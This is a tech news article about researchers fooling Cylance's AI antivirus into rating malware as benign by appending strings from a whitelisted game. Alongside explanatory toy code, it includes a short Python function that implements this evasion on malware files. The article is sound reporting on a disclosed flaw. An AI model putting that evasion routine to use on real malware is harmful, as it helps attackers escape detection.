Tech

Researchers Easily Trick Cylance's AI-Based Antivirus Into Thinking Malware Is 'Goodware'

By taking strings from an online gaming program and appending them to malicious files, researchers were able to trick Cylance’s AI-based antivirus engine into thinking programs like WannaCry and other malware are benign.
Image: Cathryn Virginia

Artificial intelligence has been touted by some in the security community as the silver bullet in malware detection. Its proponents say it’s superior to traditional antivirus since it can catch new variants and never-before-seen malware—think zero-day exploits—that are the Achilles heel of antivirus. One of its biggest champions is the security firm BlackBerry Cylance, which has staked its business model on the artificial intelligence engine in its PROTECT endpoint detection system, which the company says can detect new malicious files two years before their authors even create them.


But researchers in Australia say they’ve found a way to subvert the machine-learning algorithm in PROTECT and cause it to falsely tag already known malware as “goodware.” The method doesn’t involve altering the malicious code, as hackers generally do to evade detection. Instead, the researchers developed a “global bypass” method that works with almost any malware to fool the Cylance engine. It involves simply taking strings from a non-malicious file and appending them to a malicious one, tricking the system into thinking the malicious file is benign.

The benign strings they used came from an online gaming program, which they have declined to name publicly so that Cylance will have a chance to fix the problem before hackers exploit it.

“As far as I know, this is a world-first, proven global attack on the ML [machine learning] mechanism of a security company,” says Adi Ashkenazy, CEO of the Sydney-based company Skylight Cyber, who conducted the research with CTO Shahar Zini. “After around four years of super hype [about AI], I think this is a humbling example of how the approach provides a new attack surface that was not possible with legacy [antivirus software].”

The method works because Cylance’s machine-learning algorithm has a bias toward the benign file: if it sees strings from that file appended to a malicious one, it ignores the malicious code and features, essentially overriding the conclusion the detection engine would otherwise reach. The trick works even if the Cylance engine had previously concluded that the very same file was malicious before the benign strings were appended to it.
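To see how a single over-weighted benign feature can flip a verdict, consider a toy linear scorer. The feature names and weights below are invented for illustration and have nothing to do with Cylance’s actual model:

```python
# Toy illustration (not Cylance's actual model): in a linear scorer,
# one heavily weighted "benign" feature can outweigh every malicious
# indicator combined, flipping the verdict.

# Hypothetical feature weights: negative = malicious, positive = benign.
WEIGHTS = {
    "imports_crypto_api": -3.0,    # common in ransomware
    "deletes_shadow_copies": -5.0,
    "high_entropy_section": -2.0,
    "gaming_engine_strings": +15.0,  # over-weighted benign marker
}

def score(features: set[str]) -> float:
    """Sum the weights of the recognized features present in a file."""
    return sum(WEIGHTS[f] for f in features if f in WEIGHTS)

malware = {"imports_crypto_api", "deletes_shadow_copies", "high_entropy_section"}
print(score(malware))                              # -10.0 -> flagged malicious
print(score(malware | {"gaming_engine_strings"}))  # +5.0  -> passes as benign
```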


The researchers tested their attack against the WannaCry ransomware that crippled hospitals and businesses around the world in 2017, as well as the more recent Samsam ransomware, the popular Mimikatz hacking tool, and hundreds of other known malicious files—adding the same benign strings from the gaming program to each malicious file—and in nearly all cases, they were able to trick the Cylance engine.

Martijn Grooten, editor of Virus Bulletin, which conducts tests and reviews of malware detection programs, called the reverse-engineering research impressive and technically interesting, but wasn’t surprised by the findings.

“This is how AI works. If you make it look like benign files, then you can do this,” Grooten told Motherboard. “It mostly shows that you can’t rely on AI on its own…. AI isn’t a silver bullet…. I suspect it’ll get better at this kind of thing over time.”

A machine-learning expert Motherboard spoke to agreed.

“Usually you try to work with machine learning to cover … things which are widely unknown or you cannot do manually,” said the expert, who asked to remain anonymous because his company doesn’t authorize him to speak with media. “And it usually works pretty well, until you have some corner cases where you can’t just make the model [work].”

Though he doesn’t fault Cylance for making a mistake, he does fault the company for hyping AI in its marketing when the system contains a bias that essentially undermines it.


“Their crime is not that they coded AI poorly. Their crime is calling what they did AI,” he told Motherboard.

Cylance ranks about eighth among the top ten endpoint security companies, behind Symantec, Kaspersky, and Trend Micro. But the company’s business is growing rapidly; last year it obtained $120 million in funding, and this year it was acquired by BlackBerry in a $1.4 billion deal.

Cylance’s PROTECT isn’t the only security product that uses artificial intelligence. Other firms like Symantec, CrowdStrike, and Darktrace use it too, but Ashkenazy and Zini didn’t test those systems, and it’s not clear they would suffer from the same bias, since they’re architected differently and don’t rely as heavily on machine learning to detect malicious files as the Cylance system does.

“One of [Cylance’s] selling points… they say no more running after signatures and updates. We train the model once, and … you won’t have to train the model again for a couple of years. It’s very compelling, if it actually works,” Ashkenazy said.

But to fix the problem he and his colleague found in the Cylance engine, the company will have to retrain the system, which could be a “costly and complex process,” Ashkenazy said.

Artificial intelligence has several advantages over traditional antivirus. In traditional systems, the vendor has to analyze each new file and push out new signatures or heuristics to its scanners to detect it. (Signatures look for specific strings of code or data that are unique to a piece of malware; heuristics look at the activity the code engages in to spot actions characteristic of malware.) But, according to Cylance, its engine doesn’t require an update every time new malware or variants of existing malware are discovered. Machine-learning detection systems are supposed to not only recognize known malicious files and activity but also spot new ones.
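For contrast, here is a minimal sketch of what signature-based detection boils down to; the byte patterns and family names are made-up placeholders, not real indicators:

```python
# Minimal sketch of traditional signature matching: scan a file for
# byte patterns known to be unique to specific malware families.
# The signatures below are invented placeholders, not real IOCs.

SIGNATURES = {
    "ExampleWorm.A": bytes.fromhex("deadbeef41414141"),
    "ExampleRansom.B": b"ENCRYPT_ALL_FILES_NOW",
}

def scan(path: str) -> list[str]:
    """Return the names of any signatures found in the file."""
    data = open(path, "rb").read()
    return [name for name, pattern in SIGNATURES.items() if pattern in data]

# Each new variant needs a new SIGNATURES entry and an update push --
# the maintenance burden ML-based engines claim to avoid.
```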


In a test conducted by SE Labs and commissioned by Cylance, a 2015 version of its software was able to detect variants of the Cerber ransomware and other malicious programs that didn’t appear in the wild until 2016 and 2018.

To determine whether a file is malicious or benign, the Cylance engine looks at 4 million different features, or data points, according to Ryan Permeh, founder and chief scientist of Cylance. These include things like the file’s size, the structural elements present, and its entropy (the level of randomness). Cylance programmers then “train” the engine by showing it about a billion malicious and benign files and tweaking the system to hone its detection. During training, the system also examines the files for patterns to see how malware variants evolve over time and to anticipate how new malware might look—essentially “predicting” what malware authors will do before they do it. Models do get retrained, Permeh says, but only about every six months, and users only have to update their software if they want the latest features and performance improvements.
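Entropy is one of the few named features, and it’s cheap to compute. The sketch below is an illustration of the standard Shannon-entropy calculation that file classifiers commonly use, not Cylance’s actual feature extractor:

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: ~0 for uniform data,
    approaching 8.0 for random, compressed, or encrypted content."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

# Packed or encrypted malware tends toward high entropy, which is why
# it is a cheap, commonly used feature in ML-based file classifiers.
print(shannon_entropy(b"A" * 1024))        # 0.0
print(shannon_entropy(bytes(range(256))))  # 8.0
```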

But none of this training and testing matters if the algorithm also harbors a bias that trains it to ignore what it has learned. That’s essentially what the Skylight Cyber researchers discovered.

They purchased a copy of the Cylance program and reverse-engineered it to figure out which features or data points the agent examines to determine whether a file is benign or malicious, and they also studied how those features are weighted to arrive at the score the program gives each file.


The Cylance system analyzes each file based on these data points and assigns it a score ranging from -1,000 to 1,000, with -1,000 indicating a file with the most malicious features. Scores are visible in the program’s log file.
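Cylance hasn’t published how the model’s raw output maps onto that range, but one plausible guess is a simple linear rescaling of a benign-confidence value, something like:

```python
def confidence_to_score(p_benign: float) -> int:
    """Map a classifier's benign-probability (0.0-1.0) onto a
    -1,000 (most malicious) to 1,000 (most benign) scale.
    This mapping is a guess; Cylance's actual formula isn't public."""
    return round(2000 * p_benign - 1000)

print(confidence_to_score(0.0))   # -1000
print(confidence_to_score(0.5))   # 0
print(confidence_to_score(1.0))   # 1000
```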

When they saw how many features the program analyzes, the researchers worried initially that it would take them weeks or months to find the ones that carried the most weight in the algorithm’s decision process. That is, until they discovered that Cylance also had whitelisted certain families of executable files to avoid triggering false positives on legitimate software.

Suspecting the machine learning might be biased toward code in those whitelisted files, they extracted strings from an online gaming program Cylance had whitelisted and appended them to malicious files. The Cylance engine tagged the files as benign, and their scores moved from high negative numbers to high positive ones. The score for Mimikatz went from -799 to 998; WannaCry went from -1,000 to 545. The researchers liken it to donning a mask with a beak and having a facial-recognition system identify you as a bird, ignoring all the other characteristics indicating you’re just a person wearing an artificial beak.
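The researchers haven’t published their tooling, but the mechanics they describe amount to something as simple as the following sketch: pull the printable strings out of the whitelisted binary and tack them onto the end of the malicious file, where they change the static features without affecting execution. The function names and the minimum string length here are illustrative choices, not theirs:

```python
import re
import shutil

def extract_strings(path: str, min_len: int = 8) -> bytes:
    """Pull printable ASCII runs out of a binary, roughly the way
    the Unix `strings` utility does."""
    data = open(path, "rb").read()
    runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)
    return b"\n".join(runs)

def append_strings(malware_path: str, benign_path: str, out_path: str) -> None:
    """Copy the malicious file and append the benign strings to its end.
    Appended bytes sit past the executable's declared sections, so the
    program still runs unchanged; only its static features shift."""
    shutil.copyfile(malware_path, out_path)
    with open(out_path, "ab") as f:
        f.write(extract_strings(benign_path))
```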

They tested the top ten malware programs cited by the Center for Internet Security, then broadened the test to include 384 additional malicious files taken from online malware repositories. The average score before they appended the benign strings from the whitelisted gaming program was -0.92; after adding the strings, it was 0.63. About 84 percent of the files bypassed detection once the gaming strings were added; some files were still tagged as malicious, but with scores that had shifted significantly.


They didn’t just scan the files with the static Cylance program; they also executed the malicious files on a virtual machine running Cylance PROTECT to see whether it would catch them in action. The theory was that even if the product was tricked by the strings, the files’ malicious behavior would still be detected. It wasn’t.

Ashkenazy said the use of whitelisting in an AI program is odd, but said he understands why Cylance did it if its engine was creating false positives on those programs. The real problem, he said, was giving the whitelisted programs so much weight in the algorithm’s scoring that they override the decision the algorithm would otherwise reach for a file without the benign strings appended. He also said the failures stemmed from relying on the AI alone instead of using backup signatures or heuristics to double-check the algorithm’s conclusions.

Permeh, who is also the architect of Cylance’s machine-learning engine, said the company does use signatures and hard-coded heuristics in its product and doesn’t rely entirely on machine learning, but the AI does take precedence in detection.

He acknowledged to Motherboard the potential for the kind of bypass the researchers found, however.

“Generally speaking, in all of these AI scenarios, models are probabilistic. When you train one, you learn what’s good and what’s bad…. By training for what is a good file, we learn attributes of that… [and] it’s entirely possible that we overestimated the goodness of that,” he told Motherboard in a phone call. “One of the interesting parts of being basically the first to take an AI-first approach, is that we’re still learning. We invest a lot in adverse research, but this is still an evolution.”


Permeh doesn’t think it will take long to retrain the algorithm to fix the issue once he knows the details of the global bypass; Ashkenazy didn’t contact Cylance before disclosing the issue to Motherboard.

But Ashkenazy thinks the issue will take more time to fix than Permeh believes.

“The bias towards games and those features is there for a reason,” Ashkenazy said. “They were getting false positives for games, so retraining without sacrificing accuracy or false positive rate can’t be that simple.”

In the end, Ashkenazy doesn’t think Cylance is at fault for using machine learning, just for hyping it and relying on it so heavily for detection.

“I actually think they did a decent job applying current AI technology to security,” he told Motherboard. “It just has inherent flaws, like the possibility of having an exploitable bias which becomes a global bypass with a costly fix.”
